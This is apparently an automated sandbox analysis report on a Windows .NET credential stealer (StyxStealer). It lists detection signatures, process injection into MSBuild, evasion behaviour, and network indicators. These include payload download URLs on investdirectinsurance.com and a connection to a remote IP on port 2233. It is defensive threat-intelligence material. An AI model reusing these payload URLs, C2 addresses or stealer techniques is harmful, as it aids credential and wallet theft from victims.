Edit tour

Windows Analysis Report
Ycj3d5NMhc.exe

Overview

General Information

Sample name:	Ycj3d5NMhc.exe renamed because original name is a hash value
Original sample name:	c269ec6cc10cfa210817133e43becae40004a1ddb2220646cddf8a3165bf4269.exe
Analysis ID:	1483417
MD5:	10da3cc4689926de08a0ba47481acead
SHA1:	37d4b0ce7114c0cc427705f35430656bc3d4c049
SHA256:	c269ec6cc10cfa210817133e43becae40004a1ddb2220646cddf8a3165bf4269
Tags:	exeinvestdirectinsurance-com
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Sigma detected: Silenttrinity Stager Msbuild Activity

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Ycj3d5NMhc.exe (PID: 2884 cmdline: "C:\Users\user\Desktop\Ycj3d5NMhc.exe" MD5: 10DA3CC4689926DE08A0BA47481ACEAD)

MSBuild.exe (PID: 5992 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

conhost.exe (PID: 1904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4136 cmdline: "wmic" csproduct get UUID MD5: E2DE6500DE1148C7F6027AD50AC8B891)

conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Ycj3d5NMhc.exe PID: 2884	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 5992	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
3.2.MSBuild.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Ycj3d5NMhc.exe.12689ac0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 34.117.59.81, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 5992, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49709

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.8

Timestamp:	2024-07-27T11:38:15.193643+0200
SID:	2022930
Source Port:	443
Destination Port:	49718
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.8

Timestamp:	2024-07-27T11:37:37.062108+0200
SID:	2022930
Source Port:	443
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.8 - Destination IP: 104.21.65.79

Timestamp:	2024-07-27T11:37:20.124935+0200
SID:	2803270
Source Port:	49708
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.8 - Destination IP: 104.21.65.79

Timestamp:	2024-07-27T11:37:19.091900+0200
SID:	2803270
Source Port:	49707
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Ycj3d5NMhc.exe	ReversingLabs: Detection: 23%
Source: Ycj3d5NMhc.exe	Virustotal: Detection: 9%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 104.21.65.79:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49709 version: TLS 1.2

Source: Ycj3d5NMhc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\Administrator\Desktop\Outputs\Evop.pdb source: Ycj3d5NMhc.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00EBA7FCh	3_2_00EBA5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00EBA80Fh	3_2_00EBA5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 059D9ED4h	3_2_059D9B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-000000C4h]	3_2_059DAD6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	3_2_059DC19F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	3_2_059D3A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	3_2_059D3A7E

Source: global traffic

TCP traffic: 192.168.2.8:49710 -> 79.110.49.176:2233

Source: global traffic

HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: Joe Sandbox View

ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Zopi.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe

Code function: 0_2_00007FFB4B05164D InternetReadFile,

0_2_00007FFB4B05164D

Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Zopi.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: investdirectinsurance.com
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io

Source: MSBuild.exe, 00000003.00000002.1523018849.0000000002941000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Ycj3d5NMhc.exe, 00000000.00000002.1487067677.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/
Source: Ycj3d5NMhc.exe	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd
Source: Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd4
Source: Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdP
Source: Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdj
Source: Ycj3d5NMhc.exe	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Zopi.bd
Source: Ycj3d5NMhc.exe, 00000000.00000002.1490876841.000000001B618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://investdirectinsurance.com/m
Source: MSBuild.exe, 00000003.00000002.1523018849.0000000002941000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io
Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002941000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/json
Source: MSBuild.exe, 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002986000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/missingauth
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 104.21.65.79:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49709 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EBD3C0 NtWow64QueryInformationProcess64,	3_2_00EBD3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EBDD94 NtWow64ReadVirtualMemory64,	3_2_00EBDD94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EBD3B8 NtWow64QueryInformationProcess64,	3_2_00EBD3B8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EBA92A	3_2_00EBA92A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EBC2B0	3_2_00EBC2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EBE4F0	3_2_00EBE4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EB26F2	3_2_00EB26F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EBD6D0	3_2_00EBD6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EB1FF8	3_2_00EB1FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EB8FF7	3_2_00EB8FF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EB9782	3_2_00EB9782
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EBE061	3_2_00EBE061
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EBE070	3_2_00EBE070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EBE4E0	3_2_00EBE4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00EBD6C0	3_2_00EBD6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_05923F50	3_2_05923F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_05926868	3_2_05926868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0592CBC8	3_2_0592CBC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_05926FF8	3_2_05926FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_05926FE8	3_2_05926FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_05999430	3_2_05999430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_05995868	3_2_05995868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_05997AB0	3_2_05997AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0599EAE8	3_2_0599EAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059DD598	3_2_059DD598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D55F0	3_2_059D55F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D24B0	3_2_059D24B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D3CF2	3_2_059D3CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D7F48	3_2_059D7F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059DBE88	3_2_059DBE88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D06F0	3_2_059D06F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D5E20	3_2_059D5E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D2E5F	3_2_059D2E5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D8E52	3_2_059D8E52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059DF8C0	3_2_059DF8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D58C2	3_2_059D58C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D9B28	3_2_059D9B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059DB320	3_2_059DB320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D4348	3_2_059D4348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D8A8F	3_2_059D8A8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D0D90	3_2_059D0D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059DD589	3_2_059DD589
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D24A0	3_2_059D24A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059D06E0	3_2_059D06E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059DA640	3_2_059DA640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059DBE78	3_2_059DBE78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059DC19F	3_2_059DC19F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_059DD378	3_2_059DD378

Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameStyxStealer.exe8 vs Ycj3d5NMhc.exe
Source: Ycj3d5NMhc.exe, 00000000.00000002.1489951347.00000000026A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamegh2q.dll4 vs Ycj3d5NMhc.exe
Source: Ycj3d5NMhc.exe, 00000000.00000002.1490715904.000000001AFC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamegh2q.dll4 vs Ycj3d5NMhc.exe
Source: Ycj3d5NMhc.exe, 00000000.00000002.1489951347.0000000002681000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameStyxStealer.exe8 vs Ycj3d5NMhc.exe

Source: classification engine

Classification label: mal96.spyw.evad.winEXE@7/5@2/3

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Victim_SID[1].bd

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03

Source: Ycj3d5NMhc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Ycj3d5NMhc.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000003.00000002.1523018849.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002E10000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Ycj3d5NMhc.exe	ReversingLabs: Detection: 23%
Source: Ycj3d5NMhc.exe	Virustotal: Detection: 9%

Source: unknown	Process created: C:\Users\user\Desktop\Ycj3d5NMhc.exe "C:\Users\user\Desktop\Ycj3d5NMhc.exe"
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID	Jump to behavior

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Section loaded: cryptsp.dll	Jump to behavior
